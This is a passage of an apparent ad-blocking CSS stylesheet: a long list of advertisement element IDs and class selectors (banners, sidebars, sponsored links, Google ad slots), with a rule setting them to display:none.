xads,#bpAd,#bps-header-ad-container,#btnAds,#btnads,#btr_horiz_ad,#burn_header_ad,#button-ads-horizontal,#button-ads-vertical,#buttonAdWrapper1,#buttonAdWrapper2,#buttonAds,#buttonAdsContainer,#button_ad_container,#button_ad_wrap,#button_ads,#buttonad,#buy-sell-ads,#c4ad-Middle1,#c_ad_sb,#c_ad_sky,#caAdLarger,#catad,#category-ad,#cellAd,#channel_ad,#channel_ads,#ciHomeRHSAdslot,#circ_ad,#closeable-ad,#cmn_ad_box,#cmn_toolbar_ad,#cnnAboveFoldBelowAd,#cnnRR336ad,#cnnSponsoredPods,#cnnTopAd,#cnnVPAd,#col3_advertising,#colAd,#colRightAd,#collapseobj_adsection,#column4-google-ads,#comments-ad-container,#commercial_ads,#common_right_ad_wrapper,#common_right_lower_ad_wrapper,#common_right_lower_adspace,#common_right_lower_player_ad_wrapper,#common_right_lower_player_adspace,#common_right_player_ad_wrapper,#common_right_player_adspace,#common_right_right_adspace,#common_top_adspace,#comp_AdsLeaderboardTop,#companion-ad,#companionAd,#companionAdDiv,#companionad,#container-righttopads,#container-topleftads,#containerLocalAds,#containerLocalAdsInner,#containerMrecAd,#containerSqAd,#content-ad-header,#content-header-ad,#content-left-ad,#content-right-ad,#contentAd,#contentBoxad,#contentTopAds2,#content_ad,#content_ad_square,#content_ad_top,#content_ads_content,#content_box_300body_sponsoredoffers,#content_box_adright300_google,#content_lower_center_right_ad,#content_mpu,#contentad,#contentad_imtext,#contentad_right,#contentads,#contentinlineAd,#contents_post_ad,#contextad,#contextual-ads,#contextual-ads-block,#contextualad,#coverADS,#coverads,#ctl00_Adspace_Top_Height,#ctl00_BottomAd,#ctl00_ContentMain_BanManAd468_BanManAd,#ctl00_ContentPlaceHolder1_blockAdd_divAdvert,#ctl00_ContentRightColumn_RightColumn_Ad1_BanManAd,#ctl00_ContentRightColumn_RightColumn_Ad2_BanManAd,#ctl00_ContentRightColumn_RightColumn_PremiumAd1_ucBanMan_BanManAd,#ctl00_LHTowerAd,#ctl00_LeftHandAd,#ctl00_MasterHolder_IBanner_adHolder,#ctl00_TopAd,#ctl00_TowerAd,#ctl00_VBanner_adHolder,#ctl00__Content__RepeaterReplies_ctl03__AdReply,#ctl00_abot_bb,#ctl00_adFooter,#ctl00_advert_LargeMPU_div_AdPlaceHolder,#ctl00_atop_bt,#ctl00_cphMain_hlAd1,#ctl00_cphMain_hlAd2,#ctl00_cphMain_hlAd3,#ctl00_ctl00_MainPlaceHolder_itvAdSkyscraper,#ctl00_ctl00_ctl00_Main_Main_PlaceHolderGoogleTopBanner_MPTopBannerAd,#ctl00_ctl00_ctl00_Main_Main_SideBar_MPSideAd,#ctl00_dlTilesAds,#ctl00_m_skinTracker_m_adLBL,#ctl00_phCrackerMain_ucAffiliateAdvertDisplayMiddle_pnlAffiliateAdvert,#ctl00_phCrackerMain_ucAffiliateAdvertDisplayRight_pnlAffiliateAdvert,#ctl00_topAd,#ctrlsponsored,#cubeAd,#cube_ads,#cube_ads_inner,#cubead,#cubead-2,#currencies-sponsored-by,#custom-advert-leadboard-spacer,#dAdverts,#dItemBox_ads,#dart_160x600,#dc-display-right-ad-1,#dcadSpot-Leader,#dcadSpot-LeaderFooter,#dcol-sponsored,#defer-adright,#detail_page_vid_topads,#div-gpt-ad-1,#div-gpt-ad-2,#div-gpt-ad-3,#div-gpt-ad-4,#divAd,#divAdBox,#divAdWrapper,#divAdvertisement,#divBottomad1,#divBottomad2,#divDoubleAd,#divLeftAd12,#divLeftRecAd,#divMenuAds,#divWNAdHeader,#divWrapper_Ad,#div_ad_leaderboard,#div_video_ads,#dlads,#dni-header-ad,#dnn_adLeaderBoard2008,#dnn_ad_banner,#download_ads,#dp_ads1,#ds-mpu,#ds_ad_north_leaderboard,#editorsmpu,#em_ad_superbanner,#embedded-ad,#evotopTen_advert,#ex-ligatus,#exads,#extra-search-ads,#fb_adbox,#fb_rightadpanel,#featAds,#featuread,#featured-advertisements,#featuredAdContainer2,#featuredAds,#featured_ad_links,#feed_links_ad_container,#file_sponsored_link,#first-300-ad,#first-adlayer,#first_ad_unit,#firstad,#flAdData6,#fl_hdrAd,#flash_ads_1,#flexiad,#floatingAd,#floating_ad_container,#foot-ad-1,#footad,#footer-ad,#footer-ads,#footer-advert,#footer-adverts,#footer-sponsored,#footerAd,#footerAdDiv,#footerAds,#footerAdvertisement,#footerAdverts,#footer_ad,#footer_ad_01,#footer_ad_block,#footer_ad_container,#footer_ad_modules,#footer_ads,#footer_adspace,#footer_text_ad,#footerad,#footerads,#footeradsbox,#forum_top_ad,#four_ads,#fpad1,#fpad2,#fpv_companionad,#fr_ad_center,#frame_admain,#frnAdSky,#frnBannerAd,#frnContentAd,#front_ad728,#front_advert,#front_mpu,#ft-ad,#ft-ad-1,#ft-ad-container,#ft_mpu,#fullsizebanner_468x60,#fusionad,#fw-advertisement,#g_ad,#g_adsense,#ga_300x250,#galleries-tower-ad,#gallery-ad,#gallery-ad-m0,#gallery-random-ad,#gallery_ads,#game-info-ad,#gamead,#gameads,#gasense,#gglads,#global_header_ad_area,#gm-ad-lrec,#gmi-ResourcePageAd,#gmi-ResourcePageLowerAd,#goad1,#goads,#gooadtop,#google-ad,#google-ad-art,#google-ad-table-right,#google-ad-tower,#google-ads,#google-ads-bottom,#google-ads-header,#google-ads-left-side,#google-adsense-mpusize,#googleAd,#googleAdArea,#googleAds,#googleAdsSml,#googleAdsense,#googleAdsenseBanner,#googleAdsenseBannerBlog,#googleAdwordsModule,#googleAfcContainer,#googleSearchAds,#googleShoppingAdsRight,#googleShoppingAdsTop,#googleSubAds,#google_ad,#google_ad_container,#google_ad_inline,#google_ad_test,#google_ads,#google_ads_aCol,#google_ads_frame1,#google_ads_frame1_anchor,#google_ads_frame2,#google_ads_frame2_anchor,#google_ads_frame3,#google_ads_frame3_anchor,#google_ads_test,#google_ads_top,#google_adsense_home_468x60_1,#googlead,#googlead-sidebar-middle,#googlead-sidebar-top,#googlead2,#googleadbox,#googleads,#googleads_mpu_injection,#googleadsense,#googlesponsor,#gpt-ad-halfpage,#gpt-ad-rectangle1,#gpt-ad-rectangle2,#gpt-ad-skyscraper,#gpt-ad-story_rectangle3,#grid_ad,#gsyadrectangleload,#gsyadrightload,#gsyadtop,#gsyadtopload,#gtopadvts,#half-page-ad,#halfPageAd,#halfe-page-ad-box,#hd-ads,#hd-banner-ad,#hdtv_ad_ss,#head-ad,#head-ad-1,#head-banner468,#headAd,#head_ad,#head_advert,#headad,#header-ad,#header-ad-left,#header-ad-rectangle-container,#header-ad-right,#header-ad2010,#header-ads,#header-adspace,#header-advert,#header-advertisement,#header-advertising,#header-adverts,#header-banner-ad,#headerAd,#headerAdBackground,#headerAdContainer,#headerAdWrap,#headerAds,#headerAdsWrapper,#headerTopAd,#header_ad,#header_ad_728_90,#header_ad_container,#header_adcode,#header_ads,#header_advertisement_top,#header_flag_ad,#header_leaderboard_ad_container,#header_publicidad,#headerad,#headeradbox,#headerads,#headeradsbox,#headeradvertholder,#headeradwrap,#headline_ad,#headlinesAdBlock,#hiddenadAC,#hideads,#hl-sponsored-results,#hly_ad_side_bar_tower_left,#hly_inner_page_google_ad,#home-advert-module,#home-rectangle-ad,#home-top-ads,#homeMPU,#homeTopRightAd,#home_ad,#home_bottom_ad,#home_contentad,#home_feature_ad,#home_lower_center_right_ad,#home_mpu,#home_spensoredlinks,#homead,#homepage-ad,#homepageAdsTop,#homepageFooterAd,#homepage_right_ad,#homepage_right_ad_container,#homepage_top_ads,#hometop_234x60ad,#hor_ad,#horizad,#horizontal-banner-ad,#horizontal_ad,#horizontal_ad_top,#horizontalads,#hot-deals-ad,#houseAd,#hp-header-ad,#hp-mpu,#hp-right-ad,#hp-store-ad,#hpV2_300x250Ad,#hpV2_googAds,#hp_ad300x250,#ibt_local_ad728,#icePage_SearchLinks_AdRightDiv,#icePage_SearchLinks_DownloadToolbarAdRightDiv,#icePage_SearchResults_ads0_SponsoredLink,#icePage_SearchResults_ads1_SponsoredLink,#icePage_SearchResults_ads2_SponsoredLink,#icePage_SearchResults_ads3_SponsoredLink,#icePage_SearchResults_ads4_SponsoredLink,#idSponsoredresultend,#idSponsoredresultstart,#iframeRightAd,#iframeTopAd,#imu_ad_module,#in_serp_ad,#inadspace,#indexad,#inline-story-ad,#inlineAd,#inlinead,#inlinegoogleads,#inlist-ad-block,#inner-advert-row,#inner-top-ads,#innerpage-ad,#inside-page-ad,#insider_ad_wrapper,#instoryad,#instoryadtext,#instoryadwrap,#int-ad,#interstitial_ad_wrapper,#iqadtile8,#islandAd,#j_ad,#ji_medShowAdBox,#jmp-ad-buttons,#joead,#joead2,#js_adsense,#ka_adRightSkyscraperWide,#ka_samplead,#kaufDA-widget,#kdz_ad1,#kdz_ad2,#keyadvertcontainer,#landing-adserver,#lapho-top-ad-1,#largead,#lateAd,#layerAds_layerDiv,#layerTLDADSERV,#layer_ad_content,#layer_ad_main,#layerad,#leader-board-ad,#leaderAd,#leaderAdContainer,#leader_ad,#leader_board_ad,#leaderad,#leaderad_section,#leaderboard-ad,#leaderboard-bottom-ad,#leaderboardAd,#leaderboard_ad,#leaderboard_ad_gam,#left-ad-1,#left-ad-2,#left-ad-col,#left-ad-skin,#left-bottom-ad,#left-lower-adverts,#left-lower-adverts-container,#leftAdContainer,#leftAd_rdr,#leftAdvert,#leftSectionAd300-100,#left_ad,#left_adspace,#leftad,#leftads,#leftcolAd,#lg-banner-ad,#ligatus,#linkAds,#linkads,#live-ad,#localAds,#logoAd,#longAdSpace,#long_advertisement,#lowerAdvertisementImg,#lower_ad,#lowerads,#lowerthirdad,#lowertop-adverts,#lowertop-adverts-container,#lpAdPanel,#lrecad,#lsadvert-left_menu_1,#lsadvert-left_menu_2,#lsadvert-top,#mBannerAd,#main-ad,#main-ad160x600,#main-ad160x600-img,#main-ad728x90,#main-advert1,#main-advert2,#main-advert3,#main-bottom-ad,#main-tj-ad,#mainAd,#mainAdUnit,#mainAdvert,#mainAdvertismentP,#mainHeaderAdvertisment,#main_ad,#main_rec_ad,#main_top_ad_container,#marketing-promo,#mastAd,#mastAdvert,#mastad,#mastercardAd,#masthead_ad,#masthead_topad,#medRecAd,#media_ad,#mediaplayer_adburner,#mediumAdvertisement,#medrectad,#menuAds,#menubanner-ad-content,#mi_story_assets_ad,#mid-ad300x250,#mid-table-ad,#midRightTextAds,#mid_ad_div,#mid_ad_title,#mid_mpu,#midadd,#midadspace,#middle-ad,#middle_ad,#middle_body_advertising,#middlead,#middleads,#midrect_ad,#midstrip_ad,#mini-ad,#mochila-column-right-ad-300x250,#mochila-column-right-ad-300x250-1,#module-google_ads,#module_ad,#module_box_ad,#module_sky_scraper,#monsterAd,#moogleAd,#moreads,#most_popular_ad,#motionAd,#mpu-advert,#mpu-cont,#mpu300250,#mpuAd,#mpuDiv,#mpuSlot,#mpuWrapper,#mpuWrapperAd,#mpu_banner,#mpu_firstpost,#mpu_holder,#mpu_text_ad,#mpuad,#mpubox,#mr_banner_topad,#mrecAdContainer,#msAds,#ms_ad,#msad,#multiLinkAdContainer,#multi_ad,#my-ads,#myads_HeaderButton,#n_sponsor_ads,#namecom_ad_hosting_main,#narrow-ad,#narrow_ad_unit,#natadad300x250,#national_microlink_ads,#nationalad,#navi_banner_ad_780,#nba160PromoAd,#nba300Ad,#nbaGI300ad,#nbaHouseAnd600Ad,#nbaLeft600Ad,#nbaMidAds,#nbaVid300Ad,#nbcAd300x250,#new_topad,#newads,#news_advertorial_content,#news_advertorial_top,#ng_rtcol_ad,#noresults_ad_container,#noresultsads,#northad,#northbanner-advert,#northbanner-advert-container,#ns_ad1,#ns_ad2,#ns_ad3,#oanda_ads,#onespot-ads,#online_ad,#ovadsense,#p-googleadsense,#page-header-ad,#page-top-ad,#pageAds,#pageAdsDiv,#pageBannerAd,#page_ad,#page_content_top_ad,#pagelet_adbox,#pagelet_netego_ads,#pagelet_search_ads2,#panelAd,#pb_report_ad,#pcworldAdBottom,#pcworldAdTop,#pinball_ad,#player-below-advert,#player_ad,#player_ads,#pmad-in1,#pod-ad-video-page,#populate_ad_bottom,#populate_ad_left,#popup_domination_lightbox_wrapper,#portlet-advertisement-left,#portlet-advertisement-right,#post-promo-ad,#post5_adbox,#post_ad,#premium_ad,#priceGrabberAd,#prime-ad-space,#print-header-ad,#print_ads,#printads,#product-adsense,#promo-ad,#promoAds,#ps-vertical-ads,#pub468x60,#publicidad,#pushdown_ad,#qm-ad-big-box,#qm-ad-sky,#qm-dvdad,#quigo_ad,#r1SoftAd,#rail_ad1,#rail_ad2,#realEstateAds,#rectAd,#rect_ad,#rectangle-ad,#rectangleAd,#rectangle_ad,#refine-300-ad,#region-node-advert,#region-top-ad,#relocation_ad_container,#rh-ad-container,#rh_tower_ad,#rhapsodyAd,#rhs_ads,#rhsadvert,#right-ad,#right-ad-col,#right-ad-skin,#right-ad-title,#right-ad1,#right-ads-3,#right-advert,#right-bar-ad,#right-box-ad,#right-featured-ad,#right-mpu-1-ad-container,#right-uppder-adverts,#right-uppder-adverts-container,#rightAd,#rightAd300x250,#rightAd300x250Lower,#rightAdBar,#rightAdColumn,#rightAd_rdr,#rightAdsDiv,#rightColAd,#rightColumnMpuAd,#rightColumnSkyAd,#right_ad,#right_ad_wrapper,#right_ads,#right_advert,#right_advertisement,#right_advertising,#right_column_ad_container,#right_column_ads,#right_column_adverts,#right_column_internal_ad_container,#right_column_top_ad_unit,#rightad,#rightadContainer,#rightads,#rightadvertbar-doubleclickads,#rightbar-ad,#rightcolhouseads,#rightcolumn_300x250ad,#rightgoogleads,#rightinfoad,#rightside-ads,#rightside_ad,#righttop-adverts,#righttop-adverts-container,#rm_ad_text { display:none !important; } #ros_ad,#rotatingads,#row2AdContainer,#rprightHeaderAd,#rr_MSads,#rt-ad,#rt-ad-top,#rt-ad468,#rtMod_ad,#rtmod_ad,#sAdsBox,#sb-ad-sq,#sb_ad_links,#sb_advert,#search-google-ads,#search-sponsored-links,#search-sponsored-links-top,#searchAdSenseBox,#searchAdSenseBoxAd,#searchAdSkyscraperBox,#search_ads,#search_result_ad,#sec_adspace,#second-adlayer,#secondBoxAdContainer,#secondrowads,#sect-ad-300x100,#sect-ad-300x250-2,#section-ad-1-728,#section-ad-300-250,#section-ad-4-160,#section-blog-ad,#section-container-ddc_ads,#section_advertisements,#section_advertorial_feature,#servfail-ads,#sew-ad1,#shoppingads,#shortads,#show-ad,#showAd,#showad,#side-ad,#side-ad-container,#side-ads,#sideAd,#sideAd1,#sideAd2,#sideAdSub,#sideAds,#sideBarAd,#side_ad,#side_ad_wrapper,#side_ads_by_google,#side_sky_ad,#sidead,#sideads,#sideadtop-to,#sidebar-125x125-ads,#sidebar-125x125-ads-below-index,#sidebar-ad,#sidebar-ad-boxes,#sidebar-ad-space,#sidebar-ad-wrap,#sidebar-ad3,#sidebar-ads,#sidebar-adv,#sidebar-sponsor-link,#sidebar2ads,#sidebar_ad,#sidebar_ad_widget,#sidebar_ads,#sidebar_ads_180,#sidebar_sponsoredresult_body,#sidebar_txt_ad_links,#sidebarad,#sidebaradpane,#sidebarads,#sidebaradver_advertistxt,#sideline-ad,#single-mpu,#singlead,#site-ad-container,#site-leaderboard-ads,#site_top_ad,#sitead,#sky-ad,#skyAd,#skyAdContainer,#skyScrapperAd,#skyWrapperAds,#sky_ad,#sky_advert,#skyads,#skyadwrap,#skyline_ad,#skyscrapeAd,#skyscraper-ad,#skyscraperAd,#skyscraperAdContainer,#skyscraper_ad,#skyscraper_advert,#skyscraperad,#slide_ad,#sliderAdHolder,#slideshow_ad_300x250,#sm-banner-ad,#small_ad,#small_ad_banners_vertical,#small_ads,#smallerAd,#some-ads,#some-more-ads,#specialAd_one,#specialAd_two,#specialadvertisingreport_container,#specials_ads,#speeds_ads,#speeds_ads_fstitem,#speedtest_mrec_ad,#sphereAd,#spnAds,#sponlink,#sponlinks,#sponsAds,#sponsLinks,#sponseredlinks,#sponsorAd1,#sponsorAd2,#sponsorAdDiv,#sponsorLinks,#sponsorTextLink,#sponsor_banderole,#sponsor_deals,#sponsored,#sponsored-ads,#sponsored-features,#sponsored-links,#sponsored-listings,#sponsored-resources,#sponsored1,#sponsoredBox1,#sponsoredBox2,#sponsoredLinks,#sponsoredLinks_Top,#sponsoredList,#sponsoredResults,#sponsoredResultsWide,#sponsoredSiteMainline,#sponsoredSiteSidebar,#sponsored_ads_v4,#sponsored_container,#sponsored_content,#sponsored_game_row_listing,#sponsored_head,#sponsored_link,#sponsored_link_bottom,#sponsored_links,#sponsored_v12,#sponsoredads,#sponsoredlinks,#sponsoredlinks_cntr,#sponsoredlinkslabel,#sponsoredresults_top,#sponsoredwellcontainerbottom,#sponsoredwellcontainertop,#sponsorlink,#spotlightAds,#spotlightad,#sqAd,#squareAd,#squareAdSpace,#squareAds,#square_ad,#srp_adsense-top,#start_middle_container_advertisment,#sticky-ad,#stickyBottomAd,#story-90-728-area,#story-ad-a,#story-ad-b,#story-leaderboard-ad,#story-sponsoredlinks,#storyAd,#storyAdWrap,#storyad2,#submenu-ads,#subpage-ad-right,#subpage-ad-top,#swads,#synch-ad,#systemad_background,#tabAdvertising,#takeoverad,#tblAd,#tbl_googlead,#tcwAd,#td-GblHdrAds,#template_ad_leaderboard,#tertiary_advertising,#test_adunit_160_article,#text-ad,#text-ads,#text-link-ads,#textAd,#textAds,#text_ad,#text_ads,#text_advert,#textad,#textad3,#textad_block,#the-last-ad-standing,#thefooterad,#themis-ads,#tile-ad,#tmglBannerAd,#tmp2_promo_ad,#toolbarSlideUpAd,#top-ad,#top-ad-container,#top-ad-menu,#top-ads,#top-ads-tabs,#top-advertisement,#top-banner-ad,#top-search-ad-wrapper,#topAd,#topAd728x90,#topAdBanner,#topAdBox,#topAdContainer,#topAdSenseDiv,#topAdcontainer,#topAds,#topAdsContainer,#topAdvBox,#topAdvert,#topAdvert-09,#topBannerAd,#topBannerAdContainer,#topContentAdTeaser,#topNavLeaderboardAdHolder,#topOverallAdArea,#topRightBlockAdSense,#topSponsoredLinks,#top_ad,#top_ad-sense,#top_ad_area,#top_ad_banner,#top_ad_game,#top_ad_unit,#top_ad_wrapper,#top_ad_zone,#top_ads,#top_ads_wrap,#top_advertise,#top_advertising,#top_rectangle_ad,#top_right_ad,#top_wide_ad,#topad,#topad1,#topad2,#topad_left,#topad_right,#topadbar,#topadblock,#topaddwide,#topads,#topadsense,#topadspace,#topadwrap,#topadzone,#topbanner_ad,#topbannerad,#topbar-ad,#topcustomad,#topleaderboardad,#topnav-ad-shell,#topnavad,#toprightAdvert,#toprightad,#topsponsored,#toptextad,#tour300Ad,#tour728Ad,#tourSponsoredLinksContainer,#towerad,#ts-ad_module,#ttp_ad_slot1,#ttp_ad_slot2,#twogamesAd,#txfPageMediaAdvertVideo,#txt_link_ads,#txtads,#undergameAd,#upper-ads,#upperAdvertisementImg,#upperMpu,#upper_small_ad,#upperad,#urban_contentad_1,#urban_contentad_2,#urban_contentad_article,#v_ad,#vap_adsense-top,#vert-ads,#vert_ad,#vert_ad_placeholder,#vertical_ad,#vertical_ads,#videoAd,#videoAdvert,#video_ads_overdiv,#video_advert2,#video_advert3,#video_cnv_ad,#video_overlay_ad,#videoadlogo,#view_ads,#view_ads_advertisements,#viewads,#viewportAds,#viewvid_ad300x250,#wXcds12-ad,#wall_advert,#wallpaper-ad-link,#wallpaperAd_left,#wallpaperAd_right,#walltopad,#weblink_ads_container,#welcomeAdsContainer,#welcome_ad_mrec,#welcome_advertisement,#wf_ContentAd,#wf_FrontSingleAd,#wf_SingleAd,#wf_bottomContentAd,#wgtAd,#whatsnews_top_ad,#whitepaper-ad,#whoisRightAdContainer,#wide_ad_unit_top,#wideskyscraper_160x600_left,#wideskyscraper_160x600_right,#widget_Adverts,#widget_advertisement,#widgetwidget_adserve2,#wrapAdRight,#wrapAdTop,#wrapperAdsTopLeft,#wrapperAdsTopRight,#xColAds,#y-ad-units,#y708-ad-expedia,#y708-ad-lrec,#y708-ad-partners,#y708-ad-ysm,#y708-advertorial-marketplace,#yahoo-ads,#yahoo-sponsors,#yahooSponsored,#yahoo_ads,#yahoo_ads_2010,#yahoo_text_ad,#yahooad-tbl,#yan-sponsored,#yatadsky,#ybf-ads,#yfi_fp_ad_mort,#yfi_fp_ad_nns,#yfi_pf_ad_mort,#ygrp-sponsored-links,#ymap_adbanner,#yn-gmy-ad-lrec,#yreSponsoredLinks,#ysm_ad_iframe,#zoneAdserverMrec,#zoneAdserverSuper,.ADBAR,.ADPod,.AD_ALBUM_ITEMLIST,.AD_MOVIE_ITEM,.AD_MOVIE_ITEMLIST,.AD_MOVIE_ITEMROW,.ADbox,.Ad-300x100,.Ad-Container-976x166,.Ad-Header,.Ad-MPU,.Ad-Wrapper-300x100,.Ad120x600,.Ad160x600,.Ad160x600left,.Ad160x600right,.Ad247x90,.Ad300x,.Ad300x250,.Ad300x250L,.Ad728x90,.AdBorder,.AdBox,.AdBox7,.AdContainerBox308,.AdContainerModule,.AdHeader,.AdHere,.AdInfo,.AdInline,.AdMedium,.AdPlaceHolder,.AdProS728x90Container,.AdProduct,.AdRingtone,.AdSense,.AdSenseLeft,.AdSlot,.AdSpace,.AdTextSmallFont,.AdTitle,.AdUnit,.AdUnit300,.Ad_C,.Ad_D_Wrapper,.Ad_E_Wrapper,.Ad_Right,.AdsBottom,.AdsBoxBottom,.AdsBoxSection,.AdsBoxTop,.AdsLinks1,.AdsLinks2,.AdsRec,.AdvBoxSidebar,.Advert,.Advert300x250,.AdvertMidPage,.AdvertiseWithUs,.Advertisement,.AdvertisementTextTag,.Advman_Widget,.ArticleAd,.ArticleInlineAd,.BCA_Advertisement,.Banner300x250,.BannerAd,.BigBoxAd,.BlockAd,.BlueTxtAdvert,.BottomAdContainer,.BottomAffiliate,.BoxAd,.CG_adkit_leaderboard,.CG_details_ad_dropzone,.CWReviewsProdInfoAd,.ComAread,.CommentAd,.ContentAd,.ContentAds,.DAWRadvertisement,.DeptAd,.DisplayAd,.FT_Ad,.FeaturedAdIndexAd,.FlatAds,.FooterAds,.GOOGLE_AD,.GoogleAd,.GoogleAdSenseBottomModule,.GoogleAdSenseRightModule,.HPG_Ad_B,.HPNewAdsBannerDiv,.HPRoundedAd,.HeaderAds,.HomeContentAd,.IABAdSpace,.InArticleAd,.IndexRightAd,.LazyLoadAd,.LeftAd,.LeftButtonAdSlot,.LeftTowerAd,.M2Advertisement,.MD_adZone,.MOS-ad-hack,.MPUHolder,.MPUTitleWrapperClass,.MREC_ads,.MiddleAd,.MiddleAdContainer,.MiddleAdvert,.NewsAds,.OpaqueAdBanner,.OpenXad,.PU_DoubleClickAdsContent,.Post5ad,.Post8ad,.Post9ad,.RBboxAd,.RW_ad300,.RectangleAd,.RelatedAds,.Right300x250AD,.RightAd1,.RightAdvertiseArea,.RightAdvertisement,.RightGoogleAFC,.RightRailAd,.RightRailTop300x250Ad,.RightSponsoredAdTitle,.RightTowerAd,.STR_AdBlock,.SectionSponsor,.SideAdCol,.SidebarAd,.SidebarAdvert,.SitesGoogleAdsModule,.SkyAdContainer,.SponsoredAdTitle,.SponsoredContent,.SponsoredLinkItemTD,.SponsoredLinks,.SponsoredLinksGrayBox,.SponsoredLinksModule,.SponsoredLinksPadding,.SponsoredLinksPanel,.Sponsored_link,.SquareAd,.StandardAdLeft,.StandardAdRight,.TRU-onsite-ads-leaderboard,.TextAd,.TheEagleGoogleAdSense300x250,.TopAd,.TopAdContainer,.TopAdL,.TopAdR,.TopBannerAd,.UIWashFrame_SidebarAds,.UnderAd,.VerticalAd,.Video-Ad,.VideoAd,.WidgetAdvertiser,.a160x600,.a728x90,.ad-120x60,.ad-120x600,.ad-160,.ad-160x600,.ad-160x600x1,.ad-160x600x2,.ad-160x600x3,.ad-250,.ad-300,.ad-300-block,.ad-300-blog,.ad-300x100,.ad-300x250,.ad-300x250-first,.ad-300x250-right0,.ad-300x600,.ad-350,.ad-355x75,.ad-600,.ad-635x40,.ad-728,.ad-728x90,.ad-728x90-1,.ad-728x90-top0,.ad-728x90_forum,.ad-90x600,.ad-above-header,.ad-adlink-bottom,.ad-adlink-side,.ad-area,.ad-background,.ad-banner,.ad-banner-smaller,.ad-bigsize,.ad-block,.ad-block-square,.ad-blog2biz,.ad-body,.ad-bottom,.ad-box,.ad-break,.ad-btn,.ad-btn-heading,.ad-button,.ad-cell,.ad-column,.ad-container,.ad-container-300x250,.ad-container-728x90,.ad-container-994x282,.ad-context,.ad-disclaimer,.ad-display,.ad-div,.ad-enabled,.ad-feedback,.ad-filler,.ad-flex,.ad-footer,.ad-footer-leaderboard,.ad-forum,.ad-google,.ad-graphic-large,.ad-gray,.ad-grey,.ad-hdr,.ad-head,.ad-header,.ad-heading,.ad-holder,.ad-homeleaderboard,.ad-img,.ad-in-post,.ad-index-main,.ad-inline,.ad-island,.ad-item,.ad-label,.ad-leaderboard,.ad-left,.ad-link,.ad-links,.ad-lrec,.ad-medium,.ad-medium-two,.ad-mpl,.ad-mpu,.ad-msn,.ad-note,.ad-notice,.ad-other,.ad-permalink,.ad-place-active,.ad-placeholder,.ad-postText,.ad-poster,.ad-priority,.ad-rect,.ad-rectangle,.ad-rectangle-text,.ad-related,.ad-rh,.ad-ri,.ad-right,.ad-right-header,.ad-right-txt,.ad-row,.ad-section,.ad-show-label,.ad-side,.ad-sidebar,.ad-sidebar-outer,.ad-sidebar300,.ad-sky,.ad-skyscr,.ad-skyscraper,.ad-slot,.ad-slot-234-60,.ad-slot-300-250,.ad-slot-728-90,.ad-source,.ad-space,.ad-space-mpu-box,.ad-space-topbanner,.ad-spot,.ad-square,.ad-square300,.ad-squares,.ad-statement,.ad-story-inject,.ad-tabs,.ad-text,.ad-text-links,.ad-tile,.ad-title,.ad-top,.ad-top-left,.ad-unit,.ad-unit-300,.ad-unit-300-wrapper,.ad-unit-anchor,.ad-unit-top,.ad-vert,.ad-vertical-container,.ad-vtu,.ad-widget-list,.ad-with-us,.ad-wrap,.ad-wrapper,.ad-zone,.ad-zone-s-q-l,.ad.super,.ad08sky,.ad100,.ad120,.ad120x240backgroundGray,.ad120x600,.ad125,.ad140,.ad160,.ad160600,.ad160x600,.ad160x600GrayBorder,.ad200x60,.ad230,.ad250,.ad250c,.ad300,.ad300250,.ad300_250,.ad300x100,.ad300x250,.ad300x250-hp-features,.ad300x250Module,.ad300x250Top,.ad300x250_container,.ad300x250box,.ad300x50-right,.ad300x600,.ad310,.ad315,.ad336x280,.ad343x290,.ad400right,.ad450,.ad468,.ad468_60,.ad468x60,.ad540x90,.ad600,.ad620x70,.ad626X35,.ad644,.ad728,.ad728_90,.ad728x90,.ad728x90_container,.ad90x780,.adAgate,.adArea674x60,.adBanner,.adBanner300x250,.adBanner728x90,.adBannerTyp1,.adBannerTypSortableList,.adBannerTypW300,.adBar,.adBgBottom,.adBgMId,.adBgTop,.adBlock,.adBottomLink,.adBottomboxright,.adBox,.adBox1,.adBox230X96,.adBox728X90,.adBoxBody,.adBoxBorder,.adBoxContainer,.adBoxContent,.adBoxInBignews,.adBoxSidebar,.adBoxSingle,.adBwrap,.adCMRight,.adCell,.adColumn,.adCont,.adContTop,.adContainer,.adContentAd,.adContour,.adCreative,.adCube,.adDiv,.adElement,.adFender3,.adFrame,.adFtr,.adFullWidthMiddle,.adGoogle,.adHeader,.adHeadline,.adHolder,.adHome300x250,.adHorisontal,.adInNews,.adIsland,.adLabel,.adLeader,.adLeaderForum,.adLeaderboard,.adLeft,.adLoaded,.adLocal,.adMPU,.adMarker,.adMastheadLeft,.adMastheadRight,.adMegaBoard,.adMinisLR,.adMkt2Colw,.adModule,.adModuleAd,.adMpu,.adNewsChannel,.adNoOutline,.adNotice,.adNoticeOut,.adObj,.adPageBorderL,.adPageBorderR,.adPanel,.adPod,.adRect,.adResult,.adRight,.adSKY,.adSelfServiceAdvertiseLink,.adServer,.adSky,.adSky600,.adSkyscaper,.adSkyscraperHolder,.adSlot,.adSpBelow,.adSpace,.adSpacer,.adSplash,.adSponsor,.adSpot,.adSpot-brought,.adSpot-searchAd,.adSpot-textBox,.adSpot-twin,.adSpotIsland,.adSquare,.adSubColPod,.adSummary,.adSuperboard,.adSupertower,.adTD,.adTab,.adTag,.adText,.adTileWrap,.adTiler,.adTitle,.adTopLink,.adTopboxright,.adTout,.adTxt,.adUnit,.adUnitHorz,.adUnitVert,.adUnitVert_noImage,.adWebBoard,.adWidget,.adWithTab,.adWord,.adWrap,.adWrapper,.ad_0,.ad_1,.ad_120x90,.ad_125,.ad_130x90,.ad_160,.ad_160x600,.ad_2,.ad_200,.ad_200x200,.ad_250x250,.ad_250x250_w,.ad_3,.ad_300,.ad_300_250,.ad_300x250,.ad_300x250_box_right,.ad_336,.ad_336x280,.ad_350x100,.ad_350x250,.ad_400x200,.ad_468,.ad_468x60,.ad_600,.ad_680x15,.ad_728,.ad_728_90b,.ad_728x90,.ad_925x90,.ad_Left,.ad_Right,.ad_ad_300,.ad_amazon,.ad_banner,.ad_banner_border,.ad_bar,.ad_bg,.ad_bigbox,.ad_biz,.ad_block,.ad_block_338,.ad_body,.ad_border,.ad_botbanner,.ad_bottom,.ad_bottom_leaderboard,.ad_bottom_left,.ad_box,.ad_box2,.ad_box_ad,.ad_box_div,.ad_callout,.ad_caption,.ad_column,.ad_column_box,.ad_column_hl,.ad_contain,.ad_container,.ad_content,.ad_content_wide,.ad_contents,.ad_descriptor,.ad_disclaimer,.ad_eyebrow,.ad_footer,.ad_frame,.ad_framed,.ad_front_promo,.ad_gutter_top,.ad_head,.ad_header,.ad_heading,.ad_headline,.ad_holder,.ad_hpm,.ad_image,.ad_info_block,.ad_inline,.ad_island,.ad_jnaught,.ad_label,.